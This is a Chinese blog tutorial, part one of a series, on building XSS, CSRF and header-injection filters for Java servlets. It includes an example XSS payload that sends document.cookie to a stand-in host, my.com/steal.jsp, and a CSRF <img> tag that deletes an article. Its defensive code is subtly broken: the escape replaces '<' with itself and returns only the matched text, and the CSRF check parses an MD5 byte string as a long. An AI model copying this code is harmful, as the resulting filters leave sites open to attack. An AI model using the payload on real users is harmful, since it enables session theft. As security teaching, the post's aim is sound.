网络信息系统安全检测方案设计(上)

最新推荐文章于 2023-09-29 09:18:36 发布
最新推荐文章于 2023-09-29 09:18:36 发布
阅读量4.7k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangxin09/article/details/51926550
版权

当前网络攻击日益猖獗,各种入侵手段层出不穷。众多信息系统因为只重视业务逻辑和敏捷开发的缘故,没有在安全检测这一块给予足够的关注和一定分析,从而往往成为黑客或不法分子眼中的目标。当前信息系统多为基于 Web 的 B/S 结构系统,故本文尝试提供一种基于 Web 服务安全检测和防御的设计,并给出代码实现,务求能够防御 Web 常见的 XSS 攻击、CSRF 攻击、CRLF 注入和 SQL 注入攻击,另外包括提供 POST 白名单检测和 Cookies 加密等。

本文代码基于 Java Web 环境,在 Java 1.7 + Tomcat 7 上面通过。

跨站脚本攻击 XSS 检测

跨站脚本攻击英文全称 Cross Site Script,一般 Cross 可作 X,故在安全领域就叫做“XSS”(下面亦用此简称)。XSS 可算客户端安全领域之中的“头号大敌”。OWASP Top 10 中 XSS 一直是名列前茅的。

XSS 原理分析

自然地,Web 浏览器有“域 Domain”的概念,两个不同的域名下就是不同的“域”。即时主机名不相同,例如 a.qq.com 和 b.qq.com,都被视作不同的两个域。域的概念是浏览器“同源策略(Same Origin Policy)”的依据。同一域下面资源可以自由相互访问,但不同域下面的资源,浏览器是会严格限制的。访问不同域谓之“跨域”或“跨站”。

浏览器中, 来加载 b.js,但 b.js 却有权限通过脚本修改或影响 a 网站的页面内容,甚至发出 HTTP 请求。与之相比,异步请求 XMLHttpRequest 却禁止了跨域请求。

假设我们欺骗用户点击一 web 页面,页面包含一段盗取用户 Cookie 的脚本:

new Image().src ="http://my.com/steal.jsp?data=" + escape(document.cookie);

攻击发生后目标用户的 Cookie 信息就会被盗取,攻击者就可以利用该 Cookie 控制目标用户的账号。

XSS 检测与防御

对于 XSS 检测和防御就是 XSS 的过滤,具体过程是获取用户输入参数和参数值进行 XSS 过滤,对 Header 和 Cookie value 值进行 XSS 过滤(转码 Script 标签的 < > 符号)。

本文利用 Servlet API 自带的 HttpServletRequestWrapper 来封装了这部分的逻辑。

public class SecurityRequest extends HttpServletRequestWrapper {
	public SecurityRequest(HttpServletRequest request) {
		super(request);
	}
  …… // 重写原方法
}

首先是请求参数的过滤。凡是涉及获取参数的方法都要重写,例如 getParameter()、getParameterMap()、getParameterValues()。举一个例子,要重写 getParameter () 的话代码将是如下。

@Override
public String getParameter(String name) {

      name = XSS.xssFilter(name, XSS.XssFilterTypeEnum.DELETE.getValue());

      return XSS.xssFilter(super.getParameter(name), null);

}

其中关键的是静态方法 xssFilter(),通过正则表达式的匹配 <script> 脚本标签来转码 Script 标签的 < > 符号。

/**
 * XSS 过滤器
 * @param input
 *            输入内容
 * 
 * @param filterType
 *            过滤器类型
 * @return
 */
public static String xssFilter(String input, String filterType) {
    if (input == null || "".equals(input))
        return input;

    if (filterType == null || !XssFilterTypeEnum.checkValid(filterType))
        filterType = XssFilterTypeEnum.ESCAPSE.getValue(); // 默认转义

    if (filterType.equals(XssFilterTypeEnum.ESCAPSE.getValue())) {
        Matcher matcher = xssPattern.matcher(input);
        if (matcher.find())
            return matcher.group().replace("<", "<").replace(">", ">");

    }

    if (filterType.equals(XssFilterTypeEnum.DELETE.getValue()))
        return input.replaceAll(xssType, "");

    return input;
}

对于响应对象 Resposne 也要进行过滤。在继承 HttpServletResponseWrapper 的新响应类之中,重写下面的方法。

@Override
public void addHeader(String name, String value) {
	super.addHeader(CLRF.filterCLRF(name), XSS.xssFilter(CLRF.filterCLRF(value), null));
}

@Override
public void setHeader(String name, String value) {
	super.setHeader(CLRF.filterCLRF(name), XSS.xssFilter(CLRF.filterCLRF(value), null));
}

@SuppressWarnings("deprecation")
@Override
public void setStatus(int sc, String sm) {
	super.setStatus(sc, XSS.xssFilter(sm, null));
}

跨站请求伪造 CSRF 检测

从释义上讲,CSRF 和 XSS 很相近,但关键的不同点在于,CSRF 的跨站是伪造的——不过,伪造的定义却是模糊的。一般情况下,如果请求不是用户发出的意愿,则这个请求可以列入 CSRF 的定义范围。

CSRF 原理分析

例如目标网站 a.com,恶意网站 b.com。目标网站上有一个删除文章的功能,连接是 a.com/blog/del.jsp?id=1。这时我们欺骗用户成功登录 a.com,然后访问 b.com/csrf.htm 页面,该页面包含这样的攻击代码:<img src=”http://a.com/blog/del.jsp?id=1” /> 即可删除 a.com 上面的文章。该过程是身份认证之后完成的。

CSRF 检测与防御

业界针对 CSRF 的防御,一致的做法是使用 TokenID。具体流程是先使用 CsrfTokenId Creator 生成 csrf tokenid 后放入表单还有 Session 中,key名称必须为csrf_开头;然后对 POST 表单提交进行CSRF TokenID 验证。下面是具体代码,可以在 Servlet Filter 中调用。

private static final String CSRFTOKEN_PREFIX = "csrf_";
private static final String POST = "POST";

public void checkCsrfToken() throws SecurityException {
	if (getMethod().equals(POST)) {
		String csrfTokenKey = getTokenName();

		long csrfTokenId = (Long) getSession().getAttribute(csrfTokenKey), paramCsrfToken = Long.parseLong(getParameter(csrfTokenKey));

		if (csrfTokenId != paramCsrfToken)
			throw new SecurityException("post method csrf token not valid.");
	}
}

/**
 * 获取 csrf_开头的 key
 * 
 * @return
 */
private String getTokenName() {
	Iterator<Entry<String, String[]>> iter = getParameterMap().entrySet().iterator();
	while (iter.hasNext()) {
		Entry<String, String[]> entry = iter.next();
		if (entry.getKey().startsWith(CSRFTOKEN_PREFIX))
			return entry.getKey();
	}

	return null;
}

/**
 * 使用CsrfTokenIdCreator生成csrf tokenid后放入表单
 * 
 * @param session
 * @return
 */
public static String getCsrfTokenId(HttpSession session) {
	String str = session.getCreationTime() + session.getId();

	try {
		return new String(MessageDigest.getInstance("MD5").digest(str.getBytes()));
	} catch (NoSuchAlgorithmException e) {
		e.printStackTrace();
		return null;
	}
}

如果 Token 不通过则中断 Servlet Filter 过滤器。

(请待续……)

sp42a
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
系统测试方案通用版
qq_41899204的博客
09-17 7222
** 系统测试方案通用版 ** 1 测试范围 1.1 功能性测试 1.1.1 功能测试 1、 表单提交非空判断: 不输入任何信息直接提交,查看会不会有非空提示,根据提示进行填写(注意查看提示信息是否正确),直到不有提示能够提交表单,能提交了再查看还有那些标有必填符号(一般以“*”标识)是否都已填写,那些填写的字段没有标识必填。 2、 文本框、文本域输入: 先查看表结构看看各个文本框(文本域)的长度,然后试着输入超过字段的长度的信息,然后进行提交查看是否会出错,当然也有些文本框做了长度限制所以无法入过长的字段
网络安全管理平台测试方案v1
08-28
网络安全管理平台测试方案v1,还原下载。。。。。。
信息服务上线渗透检测网络安全检查报告和解决方案4(网站风险等级评定标准、漏洞危害分级标准、漏洞安全建议)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
06-28 1242
漏洞扫描是指对网络应用、服务器等进行全面的安全检测,以发现其中存在的安全漏洞,从而及时修复,确保网络系统的安全性。一种常见的漏洞扫描方法是黑盒测试,即对系统进行模拟攻击来发现潜在的漏洞风险。以下是一些常用的扫描工具:Nessus:开源的漏洞扫描工具,可用于扫描多种操作系统和应用程序漏洞,并提供了详细的用户和管理员报告。Acunetix:自动化的漏洞扫描工具,支持扫描 Web 应用、网络、API 等,能够发现多种漏洞类型。
针对常见物联网安全事件的持续检测和监控解决方案
亚马逊云科技专栏
02-11 583
近几年来,随着物联网技术的不断成熟和相关国家政策的驱动,大量物联网行业创新应用得到了快速发展。从消费端智能家居、智能单品的爆发式增长,到企业端在智能制造、智慧交通、公共安全和医疗领域等不断创新,整个物联网的市场规模在迅速扩展。然而,随之而来的问题便是越来越多的物联网信息安全事件不断频发。由于物联网设备的一些先天限制,比如要求设备低功耗、体积小、成本低,通常企业选择的物联网模组芯片安全性能不高,因此...
网络安全实施方案
dexi113的博客
07-02 271
对于一般的网络可为分为内网区域、外网区域、DMZ区域、用户终端区域,对于一些复杂的网络需要对网络区域进行细化。一般是使用防火墙设备进行分区域,由防火墙来控制各个区域的安全,因此如何区域划得越细需要的防火墙设备。以上几个动作都是一些被动的网络安全基本完善工作,接下来我们就要针对特定的应用部署相应的安全设备,比如针对邮件服务器的防病病毒过滤和防垃圾邮件等等,同时在网络出口出处部署流量监控、流量分析设备可以扼杀攻击萌芽状态。对现有的交换机、路由器、服务器等设备在现有的资源做好完全完善工作。
信息系统网络安全整改方案
elevn的博客
08-02 292
其次,在互联网出口区域部署两台功能相近的上网行为管理设备,虽然可以实现功能的分担、负载的分担,但也严重影响了用户的上网体验,而且两台都采用串接的方式,增加了链路单点故障的风险。安全技术实施的活动内容包括安全产品的采购、安全控制的开发以及验收与测试等环节,将针对系统具体的安全需求,在等级保护前期工作基础上,提供专业的安全技术解决方案,提供包括安全产品选型、产品部署、产品调试配置、安全加固等服务,而且站在更高的角度,以一个系统建设者的角度,把信息系统安全建设与信息系统建设过程平滑有机地结合起来。
信息服务上线渗透检测网络安全检查报告和解决方案4(XSS漏洞修复)
最新发布
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
09-29 612
它利用网站对用户输入的信任,允许攻击者在目标网站上注入恶意脚本,当用户访问被攻击的页面时,这些脚本会执行,从而盗取用户的敏感信息、破坏用户会话、传播恶意代码等,甚至可以篡改网页的内容,影响用户的浏览体验和数据安全。跨站脚本(XSS)攻击是一种常见的网络安全威胁,其中攻击者在目标网站上注入恶意脚本,当用户访问该网站时,这些脚本会被执行,从而导致各种安全问题。请注意,以上提供的方法只是防御XSS攻击的一部分,为了确保应用程序的安全性,应该综合考虑多个安全措施,并进行全面的安全审计和测试。
Web安全测试方案.pdf
07-06
本测试主要包括主动模式和被动模式两种。在被动模式中,测试人员尽可能的了解应用逻辑:比如用工具分析所有的HTTP请求及相应,以便测试人员掌握应用程序所有的接入点。
安全测试解决方案
09-24 218
安全测试解决方案https://www.alltesting.cn/testservice/anqcsplan.html 问题和背景 在网络时代,几乎所有的软件都运行在网络上,因此很容易出现各种通过网络访问的安全问题。通过安全漏洞,能够获取、修改系统的数据,给系统造成巨大的问题。 甲方缺乏必要的安全测试技术、工具,使得应用系统安全岌岌可危。 安全测试的内容 测试方法:应用系统测试 使用各种安全工具进行抓包、来进行渗透攻击 使用安全工具进行自动化扫描,发现系统漏洞 使用安全工具,通过手工测
网络安全——安全测试方法论
weixin_68789096的博客
04-17 1073
为满足安全评估的相应需求,人们已经总结出了多种开源方法论。无论被评估目标的规模有多大,复杂性有多高,只要应用这些安全评估的方法论,就可以策略性地完成各种时间要求苛刻、富有挑战性的安全评估任务。某些方法论专注于安全测试的技术方面,有些则关注管理领域。只有极少数的方法论能够同时兼顾技术因素和管理因素。在评估工作中实践这些方法论,基本上都是按部就班地执行各种测试,以精确地判断被测试系统的安全状况。推荐几种著名的安全评估方法论。
网络安全测试方案.pdf
07-09
第1章 内网安全测试 1.1 基础安全 端口隔离 MAC 安全 IP 绑定 ARP 绑定 1.2 身份认证 AAA 802.1x PPPOE Potal、CTP、认证代理 1.3 内网准入控制(盈高解决方案) Pc 状态检测() 主机外设控制 第2章 安全设备测试方案—防火墙、AC、安全网关、IPS、UTM 2.1 功能测试 基本功能测试 默认安全规则功能验证 测试目的 测试设备是否支持基本功能 测试条件 1、设备上电启动正常; 2、通过直连网线将设备 LAN 口与 PC 相连。 测试过程 1、设备开启防火墙功能; 2、查看从内向外的 ping、web 或 telnet、DNS 业务是否正常。 3、查看从外向内的 ping、web 或 telnet、DNS 业务是否正常。 预期结果 1、 步骤 2 中,ping、telnet、web 业务均正常; 2、 步骤 3 中,ping、telnet、web 业务均不正常; 其它说明和注意事项 本测试任务测试防火墙对ICMP TCP udp等处理行为 测试结果 TCP状态检测功能测试 测试目的 测试TCP状态检测功能 测试条件 1、按照网络拓扑进
网络安全测试方法.pdf
09-20
网络安全测试方法.pdf
网络安全测试计划模板.docx
06-02
网络安全测试计划模板.docx
智慧校园网络信息安全解决方案.pptx
03-26
建立可管理的信息安全体系,实现可管理、有数据、有动作。 专业化的服务机构,周期性的服务支持和应急的响应。 安全域划分和策略设计; 接入控制、行为管理; 业务维护数据安全 病毒检测及防护 定期的安全评估和...
XXX网络安全系统设计方案.txt
12-25
-3- 第二章 第二章 系统安全需求分析 系统安全需求分析 安全 2.1 计算机网络环境描述 随着 XXX 系统信息化需求的不断增长,网络应用的不断扩展、 现有的信息基础设施和信息系统安全措施逐渐暴露出了诸多问题, 如 ...
电子政务网络安全整体解决方案
01-09
1 方案设计思想 7 1.1 总体指导思想 7 1.1.1 等级保护思想 7 1.1.2 动态网络安全体系思想 8 1.2 总体设计原则 10 1.3 依据标准 11 1.4 安全模型 12 2 政务外网安全需求分析 15 2.1 网络及业务现状 15 2.1.1 网络现状...
高效的 PowerShell 脚本解混淆系统及对应的 检测方案设计.pdf
08-29
1. 基于 PowerShell 的攻击发生的 频率逐年上升 1,2 · 432% between 2016 – 2017, · 661% between 2017 –2018, · 460% in the first quarter of 2019. PowerShell 在所有攻击中出现的频率 达到 45% 。
校园网络安全方案设计.docx
06-08
网络安全是一个系统工程,包括物理安全策略、防火墙技术、账号管理、文件管理、反病毒技术、加密技术、安全性扫描、恢复技术、法律、制度、规范、教育等,以上策略都是基于人的行为展开的,不是孤立校园网络安全方案...
设计银行信息系统安全体系结构
06-13
银行信息系统安全体系结构是一个非常复杂的系统,需要综合考虑网络安全、数据保护、身份认证、访问控制等多个方面。以下是一些常见的安全措施和技术: 1. 网络安全:银行需要建立安全网络架构,包括网络拓扑、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sp42a

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值